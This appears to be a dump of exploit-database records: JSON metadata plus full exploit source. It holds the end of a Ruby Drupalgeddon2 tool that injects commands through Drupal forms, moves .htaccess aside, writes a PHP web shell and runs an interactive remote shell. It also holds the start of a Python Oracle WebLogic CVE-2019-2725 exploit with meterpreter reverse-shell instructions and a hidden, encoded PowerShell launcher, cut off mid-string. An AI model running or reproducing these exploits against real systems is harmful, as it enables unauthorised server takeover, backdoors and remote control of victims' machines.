and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, $session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\n\n # Newer PHP for an older Drupal\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n #clean.slice!(/<b>.*<br \\/>/)\n\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n clean.slice!(/The website encountered an unexpected error.*/)\n\n return clean\nend\n\n\n# Feedback when something goes right\ndef success(text)\n # Green\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\nend\n\n# Feedback when something goes wrong\ndef error(text)\n # Red\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\nend\n\n# Feedback when something may have issues\ndef warning(text)\n # Yellow\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\nend\n\n# Feedback when something doing something\ndef action(text)\n # Blue\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\nend\n\n# Feedback with helpful information\ndef info(text)\n # Light blue\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\nend\n\n# Feedback for the overkill\ndef verbose(text)\n # Dark grey\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef init_authentication()\n $uname = ask('Enter your username: ') { |q| q.echo = false }\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\nend\n\ndef is_arg(args, param)\n args.each do |arg|\n if arg == param\n return true\n end\n end\n return false\nend\n\n\n# Quick how to use\ndef usage()\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\n puts 'Example for target that does not require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com'\n puts 'Example for target that does require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\nend\n\n\n# Read in values\nif ARGV.empty?\n usage()\n exit\nend\n\n$target = ARGV[0]\ninit_authentication() if is_arg(ARGV, '--authentication')\n$verbose = is_arg(ARGV, '--verbose')\n\n\n# Check input for protocol\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\n# Check input for the end\n$target += \"/\" if not $target.end_with?(\"/\")\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs action(\"--==[::#Drupalggedon2::]==--\")\nputs \"-\"*80\nputs info(\"Target : #{$target}\")\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\nputs info(\"Write? : Skipping writing PHP web shell\") if not try_phpshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n$session_cookie = ''\n# If authentication required then login and get session cookie\nif $uname\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\n if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']\n $session_cookie = response['set-cookie'].split('; ')[0]\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\n end\n\nend\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = \"\"\n\n# Possible URLs\nurl = [\n # --- changelog ---\n # Drupal v6.x / v7.x [200]\n $target + \"CHANGELOG.txt\",\n # Drupal v8.x [200]\n $target + \"core/CHANGELOG.txt\",\n\n # --- bootstrap ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/bootstrap.inc\",\n # Drupal v8.x [403]\n $target + \"core/includes/bootstrap.inc\",\n\n # --- database ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/database.inc\",\n # Drupal v7.x [403]\n #$target + \"includes/database/database.inc\",\n # Drupal v8.x [403]\n #$target + \"core/includes/database.inc\",\n\n # --- landing page ---\n # Drupal v8.x / v7.x [200]\n $target,\n]\n\n# Check all\nurl.each do|uri|\n # Check response\n response = http_request(uri, 'get', '', $session_cookie)\n\n # Check header\n if response['X-Generator'] and $drupalverion.empty?\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\n\n if not header.empty?\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\n puts success(\"Header : v#{header} [X-Generator]\")\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\n end\n end\n\n # Check request response, valid\n if response.code == \"200\"\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? \"was not found on this server\"\n\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\n\n # Only works for CHANGELOG.txt\n if uri.match(/CHANGELOG.txt/)\n # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\n\n # Patched already? (For Drupal v8.4.x / v7.x)\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? \"SA-CORE-2018-002\"\n\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # Blank if not valid\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\n end\n\n # Check meta tag\n if not response.body.empty?\n # For Drupal v8.x / v7.x\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\n\n if not metatag.empty?\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\n puts verbose(meta.to_s) if $verbose\n end\n end\n\n # Done! ...if a full known version, else keep going... may get lucky later!\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\n end\n\n # Check request response, not allowed\n if response.code == \"403\" and $drupalverion.empty?\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v8.x)\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\n\n # If we got something, show it!\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\n end\n\n else\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\n end\nend\n\n\n# Feedback\nif not $drupalverion.empty?\n status = $drupalverion.end_with?(\"x\")? \"?\" : \"!\"\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\nelse\n puts error(\"Didn't detect Drupal version\")\n exit\nend\n\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\n exit\nend\nputs \"-\"*80\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# The attack vector to use\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\n\n# Make a request, check for form\nurl = \"#{$target}?q=#{$form}\"\nputs action(\"Testing: Form (#{$form})\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Form valid\")\nelsif response['location']\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\n exit\nelsif response.code == \"404\"\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?\")\n exit\nelsif response.code == \"403\"\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\n exit\nelsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\nelse\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\nend\n\n\nputs \"- \"*40\n\n\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\n# Drupal v7.x needs it anyway\n$clean_url = $drupalverion.start_with?(\"8\")? \"\" : \"?q=\"\nurl = \"#{$target}#{$form}\"\n\nputs action(\"Testing: Clean URLs\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Clean URLs enabled\")\nelse\n $clean_url = \"?q=\"\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n\n # Drupal v8.x needs it to be enabled\n if $drupalverion.start_with?(\"8\")\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\n exit\n elsif $drupalverion.start_with?(\"7\")\n puts info(\"Isn't an issue for Drupal v7.x\")\n end\nend\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Values in gen_evil_url for Drupal v8.x\nelementsv8 = [\n \"mail\",\n \"timezone\",\n]\n# Values in gen_evil_url for Drupal v7.x\nelementsv7 = [\n \"name\",\n]\n\nelements = $drupalverion.start_with?(\"8\") ? elementsv8 : elementsv7\n\nelements.each do|e|\n $element = e\n\n # Make a request, testing code execution\n puts action(\"Testing: Code Execution (Method: #{$element})\")\n\n # Generate a random string to see if we can echo it\n random = (0...8).map { (65 + rand(26)).chr }.join\n url, payload = gen_evil_url(\"echo #{random}\", e)\n\n response = http_request(url, \"post\", payload, $session_cookie)\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\n result = clean_result(response.body)\n if not result.empty?\n puts success(\"Result : #{result}\")\n\n if response.body.match(/#{random}/)\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\n break\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\n end\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)\")\n end\n\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\n\n puts verbose(\"response.body: #{response.body}\") if $verbose\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\n\n elsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\n\n else\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n exit\n end\n\n puts \"- \"*40 if e != elements.last\nend\n\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = \"\"\nprompt = \"drupalgeddon2\"\n\n# Possibles paths to try\npaths = [\n # Web root\n \"\",\n # Required for setup\n \"sites/default/\",\n \"sites/default/files/\",\n # They did something \"wrong\", chmod -R 0777 .\n #\"core/\",\n]\n# Check all (if doing web shell)\npaths.each do|path|\n # Check to see if there is already a file there\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\n\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\n if response.code == \"200\"\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\n else\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\n end\n\n puts \"- \"*40\n\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n folder = path.empty? ? \"./\" : path\n puts action(\"Testing: Writing To Web Root (#{folder})\")\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\n if path == \"sites/default/files/\"\n puts action(\"Moving : ./sites/default/files/.htaccess\")\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\n end\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd, $element)\n # Make the request\n response = http_request(url, \"post\", payload, $session_cookie)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n result = clean_result(response.body)\n puts success(\"Result : #{result}\") if not result.empty?\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\n if response.code == \"200\" and not response.body.empty?\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n elsif response.code == \"500\" and not response.body.empty?\n puts warning(\"Target MAY of been exploited... Bit of blind leading the blind\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n webshellpath = \"\"\n\n puts \"- \"*40 if path != paths.last\nend if try_phpshell\n\n# If a web path was set, we exploited using PHP!\nif not webshellpath.empty?\n # Get hostname for the prompt\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\n\n puts \"-\"*80\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\n# Should we be trying to call commands via PHP?\nelsif try_phpshell\n puts warning(\"FAILED : Couldn't find a writeable web path\")\n puts \"-\"*80\n puts action(\"Dropping back to direct OS commands\")\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"~ERROR~\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Check input\n puts warning(\"WARNING: Detected an known bad character (>)\") if command =~ />/\n\n # Exit\n break if command == \"exit\"\n\n # Blank link?\n next if command.empty?\n\n # If PHP web shell\n if not webshellpath.empty?\n # Send request\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\n # Direct OS commands\n else\n url, payload = gen_evil_url(command, $element, true)\n response = http_request(url, \"post\", payload, $session_cookie)\n\n # Check result\n if not response.body.empty?\n result = clean_result(response.body)\n end\n end\n\n # Feedback\n puts result\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-30T00:00:00", "title": "Oracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-04-30T00:00:00", "id": "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "href": "", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\n# Date: 30/04/2019\n# Exploit Author: Avinash Kumar Thapa\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\n# Tested on:\n\t#OS: Windows 2012 R2 (Build 9600).\n\t#Architecture : x64\n\t#System Language : en_US\n\n\n# CVE : CVE-2019-2725\n\n\n# Script Usage:\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\n# Add the powershell command in the variable\n\n__author__ = \"Avinash Kumar Thapa\"\n__description__ = \"\"\"\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\n\nCREDIT STATEMENT:\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\n\nBadcode of Knownsec 404 Team: CVE-2019-2725\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\nZengShuai Hao: CVE-2019-2725\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\n\n\"\"\"\n\nimport requests\nimport sys\n\nprint \"Exploit Written by Avinash Kumar Thapa\"\n\n\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQBRAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1